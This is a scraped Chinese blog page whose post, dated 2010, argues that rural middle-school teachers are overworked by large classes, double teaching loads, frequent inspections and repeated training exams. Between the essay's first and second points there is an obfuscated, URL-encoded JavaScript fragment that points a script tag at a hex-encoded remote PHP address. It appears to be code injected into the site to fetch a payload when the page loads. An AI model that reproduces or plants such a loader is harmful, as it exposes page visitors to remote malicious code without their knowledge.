注册 登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

柳叶轻风的博客

寻求自己内心的那个伊甸园。

 
 
 

日志

 
 
关于我

人生几何,不过是来去匆匆,何不潇洒走一回?让世界因为有了你我而变得更加的精彩,更加的和谐,更多了一份爱.(本博客内容均系原创。)

老师是该减负还是该增负?  

2010-08-30 21:27:34|  分类: 教育心得 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 假期结束,繁忙的新学期又即将开始。这学期,学校要多开设一个班级,在没有新的教师加入的情况下,我们每个教师的平均系数势必又会增加一些。上学期我们学校的平均系数是十四左右,那么今年一定要增至十五左右了吧?这几年我们学校的教师调走的不少,却很少有新教师进来。所以教师的负担可谓越来越重。一边是很多师范院校大学生就业难找工作,一边是很多学校缺少科任教师,特别是英语和化学物理学科教师。一边是说超编超岗,一边是教师负担过重。           

         作为一个普通教师,我认为我们的负担来还是偏重了。表现在:

          一,班级人数较多。一个班级五十多个人。这样导致教师的关注面太大,就无法有针对性地对每一个学生进行细致的身心关注和学习辅导。就拿批改作文来说,仔细批改一叠五十多人的作文本至少要两三个小时。而每个教师的时间和精力都是有限的。如果每个班级的人数少了,能控制在三十人以下,我想这不光是表面上所看到的减轻了教师的负担,并且绝对是有利于学生的全面发展的。就好比一个母亲,要照顾一个孩子和十几个孩子,那成效绝对是不同的。当然小班化有利于提高教学成效,但却需要更多的师资力量,这是不言而喻的。所以,加大教育投资既应该包括物质投资也应该还包括人力资源投资。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<         二,教师基本要担任两个班级的主课。如果我们能每人只担任一个班级的主课,我想对我们教学质量的提高也是很有益处的。但由于师资力量不够,所以我们都只能兼两个班的主课老师。

       三,各类检查过多过频。像很多带过好多轮回的老教师,每年还是要周而复始地重新备课。而像我们在电脑上制作了课件的,也还是要在备课本上备上相关内容。这样其实就是重复劳动。在我看来,真的并没多大收益。而每月的听课呀,论文呀,学习心得呀,也是烦不胜烦。当然备课,听课,上课和批改业,撰写论文,似乎都是我们教师应做的基本工作,但还是觉得它最大的作用就是加重了我们教师的工作负担。在我看来,我们最主要的任务是面对学生,如何把我们的学生在德智体美劳各方面尽量教好才是最重要的,而不是去看你备课是多么认真,论文写得是多么有水准。

          四,各种名目繁多的培训考试,也无形中增加了我们教师的负担。每年的远程教育培训考试。两年一次的普法考试,三年一次的专业考试,虽然说起来它来都是有目的的。远程教育培训是为了学习新的教学理念;普法考试是为了普及法律知识,专业考试是为了加强教师对本专业知识的更新。但是真的起到了这些作用吗?我很是怀疑。

              总之,我认为 我们农村中学的教师现在总的来说工作负担过重,特别是一些教学工作之外的负担过多。但愿教育教导能关注到这一点,加大我们农村中学的师资投入,改善我们农村教师疲惫的这一状态,减少城乡教学师资的悬殊,让我们农村教师更加爱岗敬业,也让农村教育得以更加健康全面的发展。

  评论这张
 
阅读(61)| 评论(7)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018